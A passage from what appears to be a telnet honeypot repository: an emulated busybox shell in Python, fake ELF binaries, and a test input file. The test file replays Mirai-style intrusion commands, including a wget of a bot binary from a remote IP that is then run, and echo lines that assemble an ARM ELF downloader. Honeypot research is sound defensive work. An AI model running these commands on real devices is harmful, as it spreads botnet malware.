\\x00\\x08\\x00(\\x00\\x1c\\x00\\x1b\\x00\\x01\\x00\\x00p\\xc0X\\x01\\x00\\xc0\\xd8\\x01\\x00\\xc0\\xd8\\x01\\x00\\x18\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x06\\x00\\x00\\x004\\x00\\x00\\x004\\x80\\x00\\x004\\x80\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x004\\x01\\x00\\x004\\x81\\x00\\x004\\x81\\x00\\x00\\x13\\x00\\x00\\x00\\x13\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x80\\x00\\x00\\xdcX\\x01\\x00\\xdcX\\x01\\x00\\x05\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x01\\x00\\x00\\x00\\xdcX\\x01\\x00\\xdcX\\x02\\x00\\xdcX\\x02\\x00\\x1c\\x04\\x00\\x00\\xbc\\x10\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x02\\x00\\x00\\x00\\xe8X\\x01\\x00\\xe8X\\x02\\x00\\xe8X\\x02\\x00\\x08\\x01\\x00\\x00\\x08\\x01\\x00\\x00\\x06\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00H\\x01\\x00\\x00H\\x81\\x00\\x00H\\x81\\x00\\x00D\\x00\\x00\\x00D\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00Q\\xe5td\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x04\\x00\\x00\\x00/lib/ld-linux.so.3\\x00\\x00\\x04\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00GNU\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x1b\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x03\\x00\\x00\\x00GNU\\x00\\x02Tz0\\x80\\x94\\xc2\\x8e%\\xf1\\xa4\\xad\\xc7D\\xa9\\x91q\\x94\\xdb\\na\\x00\\x00\\x00\\x06\\x00\\x00\\x00 \\x00\\x00\\x00\\n\\x00\\x00\\x00\\x00I\\x10\\x92\\x02D\\x1b&@\\x10@\\xe0B\\x00`\\x00\\x91AA\\x10\\x00r\\x11\\x11aH\\x14(\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x80\\x90\\t\\x00 \\x08\\x00*\\x00@\\x00$\\xad\\x11\\x10\\x81,(\\x00\\x00\\t@J!\\x91\\x19\\xadA\\x04\\x80IE\\x85\\x85\\xf0\\x88\\xb3h\\x80\\x02H\\x08\\x80\\x80\\x00\\x08\\x01(d\\x0e!M\\xe0\\xa8D\\x94\\x02 \\x00\\x08\\x01\\x87)\\x00\\x08\\n\\x00J\\x08\\x0e\\x01\\xc0-\\x00 @\\x18\\x80d\\xe6 \\x81\\x02\\x00\\x89\\n\\x90\\x00$\\x0e\\x8c\\xb0(\\x06\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\t\\x00\\x00\\x00\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\r\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1d\\x00\\x00\\x00\\x1e\\x00\\x00\\x00\\x1f\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00%\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00,\\x00\\x00\\x000\\x00\\x00\\x002\\x00\\x00\\x00\\x00\\x00\\x00\\x003\\x00\\x00\\x00\\x00\\x00\\x00\\x006\\x00\\x00\\x008\\x00\\x00\\x00:\\x00\\x00\\x00<\\x00\\x00\\x00>\\x00\\x00\\x00?\\x00\\x00\\x00A\\x00\\x00\\x00G\\x00\\x00\\x00I\\x00\\x00\\x00\\x00\\x00\\x00\\x00J\\x00\\x00\\x00\\x00\\x00\\x00\\x00K\\x00\\x00\\x00L\\x00\\x00\\x00\\x00\\x00\\x00\\x00N\\x00\\x00\\x00R\\x00\\x00\\x00S\\x00\\x00\\x00T\\x00\\x00\\x00U\\x00\\x00\\x00\\x00\\x00\\x00\\x00V\\x00\\x00\\x00W\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00Y\\x00\\x00\\x00Z\\x00\\x00\\x00\\\\\\x00\\x00\\x00^\\x00\\x00\\x00`\\x00\\x00\\x00c\\x00\\x00\\x00d\\x00\\x00\\x00f\\x00\\x00\\x00h\\x00\\x00\\x00i\\x00\\x00\\x00k\\x00\\x00\\x00n\\x00\\x00\\x00q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00t\\x00\\x00\\x00\\x00\\x00\\x00\\x00u\\x00\\x00\\x00v\\x00\\x00\\x00y\\x00\\x00\\x00z\\x00\\x00\\x00\\x00\\x00\\x00\\x00{\\x00\\x00\\x00\\x00\\x00\\x00\\x00}\\x00\\x00\\x00~\\x00\\x00\\x00\\x7f\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x81\\x00\\x00\\x00\\x82\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\x00\\x00\\x00\\x08,\\xae\\xff_\\x96\\x93\\x1c\\x03}\\x1eL\\xa3Z\\xef\\x90V\\xdb\\x93\\x1c\\xa8vbICw)\\x91,2@\\xfd\\xda\\x80A\\xb7\\xed\\xe9C+\\xf1\\x81B\\x84\\xcf\\x18L\\x0fvT<\\x94\\xca\\x96\\x93\\x1c\\xcd?\\x0c\\xaf\\x88j\\x06\\xaf\\x8dm\\x94\\x06\\x08~\\x92\\x1c!t\\xb0\\x02\\xe2\\xad\\xc6\\x1b.N=\\xf6\\xdb\\xf7\\x00^\\x01\\xaf4\\xe8_t;\\xc5\"\n\nELF_BIN_X86  = \"\\x7fELF\\x02\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00>\\x00\\x01\\x00\\x00\\x00P\\x1c\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb8\\x81\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x008\\x00\\t\\x00@\\x00\\x1c\\x00\\x1b\\x00\\x06\\x00\\x00\\x00\\x05\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x008\\x02\\x00\\x00\\x00\\x00\\x00\\x008\\x02\\x00\\x00\\x00\\x00\\x00\\x008\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x98m\\x00\\x00\\x00\\x00\\x00\\x00\\x98m\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\xf0{\\x00\\x00\\x00\\x00\\x00\\x00\\xf0{ \\x00\\x00\\x00\\x00\\x00\\xf0{ \\x00\\x00\\x00\\x00\\x00\\x90\\x04\\x00\\x00\\x00\\x00\\x00\\x000\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x06\\x00\\x00\\x00X|\\x00\\x00\\x00\\x00\\x00\\x00X| \\x00\\x00\\x00\\x00\\x00X| \\x00\\x00\\x00\\x00\\x00\\xf0\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00T\\x02\\x00\\x00\\x00\\x00\\x00\\x00T\\x02\\x00\\x00\\x00\\x00\\x00\\x00T\\x02\\x00\\x00\\x00\\x00\\x00\\x00D\\x00\\x00\\x00\\x00\\x00\\x00\\x00D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\xe5td\\x04\\x00\\x00\\x00d`\\x00\\x00\\x00\\x00\\x00\\x00d`\\x00\\x00\\x00\\x00\\x00\\x00d`\\x00\\x00\\x00\\x00\\x00\\x00D\\x02\\x00\\x00\\x00\\x00\\x00\\x00D\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00Q\\xe5td\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00R\\xe5td\\x04\\x00\\x00\\x00\\xf0{\\x00\\x00\\x00\\x00\\x00\\x00\\xf0{ \\x00\\x00\\x00\\x00\\x00\\xf0{ \\x00\\x00\\x00\\x00\\x00\\x10\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00/lib64/ld-linux-x86-64.so.2\\x00\\x04\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00GNU\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x03\\x00\\x00\\x00GNU\\x00Y\\xde\\xf0\\x1bLK<H}\\x8b\\xb8\\x98mI\\xbeo\\xf4b8w\\x03\\x00\\x00\\x005\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x12\\x01\\xd2$\\x12)\\x00V`A\\x00\\x0e \\x00\\x00\\x005\\x00\\x00\\x009\\x00\\x00\\x00@\\x00\\x00\\x00\\x04\\x8b&\\xa4(\\x1d\\x8c\\x1c\\x10\\x8aM#\\xc9MB#\\xbcPv\\x9e\\xacK\\xe3\\xc0\\x96\\xa0\\x89\\x97F-\\xe4\\xde\\xce,cr\\xe4bA\\xf59\\xf2\\x8b\\x1c*\\xd4\\xb8\\xd3\\x1c\\xedc*?\\x04K\\x86\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x01\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00<\\x01\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x01\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00s\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xca\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x001\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd9\\x02\\x00\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00y\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00j\\x01\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\nglobalfiles = {\n    \"/proc/mounts\": \"\"\"/dev/root /rom squashfs ro,relatime 0 0\nproc /proc proc rw,nosuid,nodev,noexec,noatime 0 0\nsysfs /sys sysfs rw,nosuid,nodev,noexec,noatime 0 0\ntmpfs /tmp tmpfs rw,nosuid,nodev,noatime 0 0\n/dev/mtdblock10 /overlay jffs2 rw,noatime 0 0\noverlayfs:/overlay / overlay rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work 0 0\ntmpfs /dev tmpfs rw,nosuid,relatime,size=512k,mode=755 0 0\ndevpts /dev/pts devpts rw,nosuid,noexec,relatime,mode=600 0 0\ndebugfs /sys/kernel/debug debugfs rw,noatime 0 0\\n\"\"\",\n    \"/proc/cpuinfo\": \"\"\"processor       : 0\nmodel name      : ARMv6-compatible processor rev 7 (v6l)\nBogoMIPS        : 697.95\nFeatures        : half thumb fastmult vfp edsp java tls \nCPU implementer : 0x41\nCPU architecture: 7\nCPU variant     : 0x0\nCPU part        : 0xb76\nCPU revision    : 7\n\nHardware        : BCM2835\nRevision        : 000e\nSerial          : 0000000000000000\\n\"\"\",\n    \"/bin/echo\": ELF_BIN_ARM,\n    \"/bin/busybox\": ELF_BIN_ARM\n}\n\ndef instantwrite(msg):\n\tsys.stdout.write(msg)\n\tsys.stdout.flush()\n\nclass Env:\n\tdef __init__(self, output=instantwrite):\n\t\tself.files   = {}\n\t\tself.deleted = []\n\t\tself.events  = {}\n\t\tself.output  = output\n\n\tdef write(self, string):\n\t\tself.output(string)\n\n\tdef deleteFile(self, path):\n\t\tif path in self.files:\n\t\t    self.deleted.append((path, self.files[path]))\n\t\t    del self.files[path]\n\n\tdef writeFile(self, path, string):\n\t\tif path in self.files:\n\t\t    self.files[path] += string\n\t\telse:\n\t\t    self.files[path] = string\n\n\tdef readFile(self, path):\n\t\tif path in self.files:\n\t\t    return self.files[path]\n\t\telif path in globalfiles:\n\t\t    return globalfiles[path]\n\t\telse:\n\t\t    return None\n\n\tdef listen(self, event, handler):\n\t\tself.events[event] = handler\n\n\tdef action(self, event, data):\n\t\tif event in self.events:\n\t\t    self.events[event](data)\n\t\telse:\n\t\t    print(\"WARNING: Event '\" + event + \"' not registered\")\n\t\t    \n\tdef listfiles(self):\n\t\treturn self.files\n\nclass RedirEnv:\n\tdef __init__(self, baseenv, redir):\n\t\tself.baseenv = baseenv\n\t\tself.redir   = redir\n\n\tdef write(self, string):\n\t\tself.baseenv.writeFile(self.redir, string)\n\n\tdef deleteFile(self, path):\n\t\tself.baseenv.deleteFile(path)\n\n\tdef writeFile(self, path, string):\n\t\tself.baseenv.writeFile(path, string)\n\n\tdef readFile(self, path):\n\t\treturn self.baseenv.readFile(path)\n\n\tdef listen(self, event, handler):\n\t\tself.baseenv.listen(event, handler)\n\n\tdef action(self, event, data):\n\t\tself.baseenv.action(event, data)\n\t\t    \n\tdef listfiles(self):\n\t\treturn self.baseenv.listfiles()\n\nclass Command:\n    def __init__(self, args):\n        self.args             = args\n        self.redirect_from_f  = None\n        self.redirect_to_f    = None\n        self.redirect_append  = False\n        self.shell            = Proc.get(\"exec\")\n        \n    def redirect_to(self, filename):\n        self.redirect_to_f = filename\n        self.redirect_append = False\n        \n    def redirect_from(self, filename):\n        self.redirect_from_f = filename\n        \n    def redirect_app(self, filename):\n        self.redirect_to(filename)\n        self.redirect_append = True\n\n    def run(self, env):\n        if self.isnone():\n            return 0\n        \n        if self.redirect_to_f != None:\n            if not(self.redirect_append):\n                env.deleteFile(self.redirect_to_f)\n            env = RedirEnv(env, self.redirect_to_f)\n            \n        return self.shell.run(env, self.args)\n    \n    def isnone(self):\n        return len(self.args) == 0\n\n    def __str__(self):\n        return \"cmd(\" + \" \".join(self.args) + \")\"\n\nclass CommandList:\n\n    def __init__(self, mode, cmd1, cmd2):\n        self.mode = mode\n        self.cmd1 = cmd1\n        self.cmd2 = cmd2\n        \n    def redirect_to(self, filename):\n        self.cmd1.redirect_to(filename)\n        self.cmd2.redirect_to(filename)\n        \n    def redirect_from(self, filename):\n        self.cmd1.redirect_from(filename)\n        self.cmd2.redirect_from(filename)\n        \n    def redirect_app(self, filename):\n        self.cmd1.redirect_app(filename)\n        self.cmd2.redirect_app(filename)\n\n    def run(self, env):\n        ret = self.cmd1.run(env)\n        if (self.mode == \"&&\"):\n            if (ret == 0):\n                return self.cmd2.run(env)\n            else:\n                return ret\n        elif (self.mode == \"||\"):\n            if (ret != 0):\n                return self.cmd2.run(env)\n            else:\n                return ret\n        elif (self.mode == \";\"):\n            if self.cmd2.isnone():\n                return ret            \n            return self.cmd2.run(env)\n        else:\n            print \"WARN: Bad Mode\"\n            return 1\n        \n    def isnone(self):\n        return self.cmd1.isnone() and self.cmd2.isnone()\n\n    def __str__(self):\n        return \"(\" + str(self.cmd1) + self.mode + str(self.cmd2) + \")\"\n\nclass Actions(object):\n    def make_arg_noquot(self, input, start, end, elements):\n\t    return input[start:end]\n\n    def make_arg_quot(self, input, start, end, elements):\n        return elements[1].text\n\n    def make_list(self, input, start, end, elements):\n        c1 = elements[0]\n        \n        if len(elements[1].elements) != 0:\n            c2 = elements[1].elements[3]\n            \n            return CommandList(\";\", c1, c2)\n        \n        return c1\n    \n    def make_single(self, input, start, end, elements):\n        c1 = elements[0]\n        \n        if len(elements[1].elements) != 0:\n            c2 = elements[1].elements[3]\n            op = elements[1].elements[1]\n            \n            return CommandList(op.text, c1, c2)\n        \n        return c1\n    \n    def make_pipe(self, input, start, end, elements):\n        c1 = elements[0]\n        \n        if len(elements[1].elements) != 0:\n            c2 = elements[1].elements[3]\n            \n            c1.redirect_to(\"/dev/pipe\")\n            c2.redirect_from(\"/dev/pipe\")\n            \n            return CommandList(\";\", c1, c2)\n        \n        \n        return c1\n    \n    def make_redir(self, input, start, end, elements):\n        \n        c = elements[0]\n        \n        for redirect in elements[1].elements:\n            operator = redirect.elements[1].text\n            filename = redirect.elements[3]\n            \n            if operator == \">\":\n                c.redirect_to(filename)\n            elif operator == \">>\":\n                c.redirect_app(filename)\n            elif operator == \"<\":\n                c.redirect_from(filename)\n            else:\n                print \"WARNING: unsupported redirect operator \" + operator\n                \n        return c\n    \n    def make_cmdbrac(self, input, start, end, elements):\n        return elements[2]\n    \n    def make_args(self, input, start, end, elements):\n        if isinstance(elements[0], basestring): \n            r = [ elements[0] ]\n        else:\n            r = []\n        \n        for arg in elements[1].elements:\n            if isinstance(arg.elements[1], basestring):\n                r.append(arg.elements[1])\n        \n        c = Command(r)\n        \n        return c\n\ndef run(string, env):\n    c = parse(filter_ascii(string).strip(), actions=Actions())\n    return c.run(env)\n\ndef test_shell():\n    env = Env()\n    while True:\n        sys.stdout.write(\" # \")\n        sys.stdout.flush()\n        line = sys.stdin.readline()\n        if line == \"\":\n            break\n        if line == \"\\n\":\n            continue\n        line = line[:-1] \n        tree = run(line, env)\n        sys.stdout.flush()\n\n"
  },
  {
    "path": "honeypot/shell/test.sh",
    "content": "#!/bin/bash\ncanopy grammar.peg --lang python && python shell.py < test.txt\n\n"
  },
  {
    "path": "honeypot/shell/test.txt",
    "content": "cp\nls\ncat\ndd\nrm\necho\nbusybox\nsh\ncd\ntrue\nfalse\nchmod\nuname\n:\nps\n\nenable\nshell\nsh\n/bin/busybox ECCHI\n/bin/busybox ps; /bin/busybox ECCHI\n/bin/busybox cat /proc/mounts; /bin/busybox ECCHI\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon\n/bin/busybox ECCHI\nrm /proc/.t; rm /proc/.sh; rm /proc/.human\nrm /sys/.t; rm /sys/.sh; rm /sys/.human\nrm /tmp/.t; rm /tmp/.sh; rm /tmp/.human\nrm /overlay/.t; rm /overlay/.sh; rm /overlay/.human\nrm /.t; rm /.sh; rm /.human\nrm /dev/.t; rm /dev/.sh; rm /dev/.human\nrm /dev/pts/.t; rm /dev/pts/.sh; rm /dev/pts/.human\nrm /sys/kernel/debug/.t; rm /sys/kernel/debug/.sh; rm /sys/kernel/debug/.human\nrm /dev/.t; rm /dev/.sh; rm /dev/.human\ncd /proc/\n/bin/busybox cp /bin/echo dvrpelper; >dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI\n/bin/busybox cat /bin/echo\n/bin/busybox ECCHI\n/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI\n/bin/busybox wget http://95.215.60.17:80/bins/miraint.x86 -O - > dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI\n./dvrpelper telnet.x86.bot.wget; /bin/busybox IHCCE\nrm -rf upnp; > dvrpelper; /bin/busybox ECCHI\ncat /proc/mounts; (/bin/busybox DFYHE || :)\necho -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x28\\x00\\x01\\x00\\x00\\x00\\x54\\x00\\x01\\x00\\x34\\x00\\x00\\x00\\x40\\x01\\x00\\x00\\x00\\x02\\x00\\x05\\x34\\x00\\x20\\x00\\x01\\x00\\x28\\x00\\x04\\x00\\x03\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\" >> .s\necho -ne \"\\x00\\x00\\x01\\x00\\xf8\\x00\\x00\\x00\\xf8\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x02\\x00\\xa0\\xe3\\x01\\x10\\xa0\\xe3\\x06\\x20\\xa0\\xe3\\x07\\x00\\x2d\\xe9\\x01\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x0c\\xd0\\x8d\\xe2\\x00\\x60\\xa0\\xe1\\x70\\x10\\x8f\\xe2\\x10\\x20\\xa0\\xe3\" >> .s\necho -ne \"\\x07\\x00\\x2d\\xe9\\x03\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x14\\xd0\\x8d\\xe2\\x4f\\x4f\\x4d\\xe2\\x05\\x50\\x45\\xe0\\x06\\x00\\xa0\\xe1\\x04\\x10\\xa0\\xe1\\x4b\\x2f\\xa0\\xe3\\x01\\x3c\\xa0\\xe3\\x0f\\x00\\x2d\\xe9\\x0a\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x10\\xd0\\x8d\\xe2\" >> .s\necho -ne \"\\x00\\x50\\x85\\xe0\\x00\\x00\\x50\\xe3\\x04\\x00\\x00\\xda\\x00\\x20\\xa0\\xe1\\x01\\x00\\xa0\\xe3\\x04\\x10\\xa0\\xe1\\x04\\x00\\x90\\xef\\xee\\xff\\xff\\xea\\x4f\\xdf\\x8d\\xe2\\x00\\x00\\x40\\xe0\\x01\\x70\\xa0\\xe3\\x00\\x00\\x00\\xef\\x02\\x00\\x68\\xab\\xb1\\x67\\xe2\\xc5\\x41\\x26\\x00\\x00\\x00\\x61\\x65\\x61\" >> .s\necho -ne \"\\x62\\x69\\x00\\x01\\x1c\\x00\\x00\\x00\\x05\\x43\\x6f\\x72\\x74\\x65\\x78\\x2d\\x41\\x35\\x00\\x06\\x0a\\x07\\x41\\x08\\x01\\x09\\x02\\x2a\\x01\\x44\\x01\\x00\\x2e\\x73\\x68\\x73\\x74\\x72\\x74\\x61\\x62\\x00\\x2e\\x74\\x65\\x78\\x74\\x00\\x2e\\x41\\x52\\x4d\\x2e\\x61\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\\x73\\x00\" >> .s\necho -ne \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x54\\x00\\x01\\x00\\x54\\x00\\x00\\x00\\xa4\\x00\\x00\\x00\" >> .s\necho -ne \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x03\\x00\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x00\\x00\\x00\\x27\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\" >> .s\necho -ne \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1f\\x01\\x00\\x00\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" >> .s\ncat .s\n/bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\\x0181c46036\\x7f'; /bin/busybox printf '\\00281c46036\\177'; /bin/echo -ne '\\x0381c46036\\x7f'; /usr/bin/printf '\\00481c46036\\177'; /bin/busybox tftp; /bin/busybox 81c46036tftp;\n\n"
  },
  {
    "path": "honeypot/telnet.py",
    "content": "import struct\nimport socket\nimport traceback\nimport time\n\nfrom thread import start_new_thread\n\nfrom session import Session\nfrom util.dbg import dbg\nfrom util.config import config\n\nclass IPFilter:\n\n\tdef __init__(self):\n\t\tself.map = {}\n\t\tself.timeout = config.get(\"telnet_ip_min_time_between_connections\")\n\n\tdef add_ip(self, ip):\n\t\tself.map[ip] = time.time()\n\n\tdef is_allowed(self, ip):\n\t\tself.clean()\n\t\treturn not(ip in self.map)\n\n\tdef clean(self):\n\n\t\ttodelete = []\n\n\t\tfor ip in self.map:\n\t\t\tif self.map[ip] + self.timeout < time.time():\n\t\t\t\ttodelete.append(ip)\n\n\t\tfor ip in todelete:\n\t\t\tdel self.map[ip]\n\nclass Telnetd:\n\tcmds   = {}\n\tcmds[240] = \"SE   - subnegoation end\"\n\tcmds[241] = \"NOP  - no operation\"\n\tcmds[242] = \"DM   - data mark\"\n\tcmds[243] = \"BRK  - break\"\n\tcmds[244] = \"IP   - interrupt process\"\n\tcmds[245] = \"AO   - abort output\"\n\tcmds[246] = \"AYT  - are you 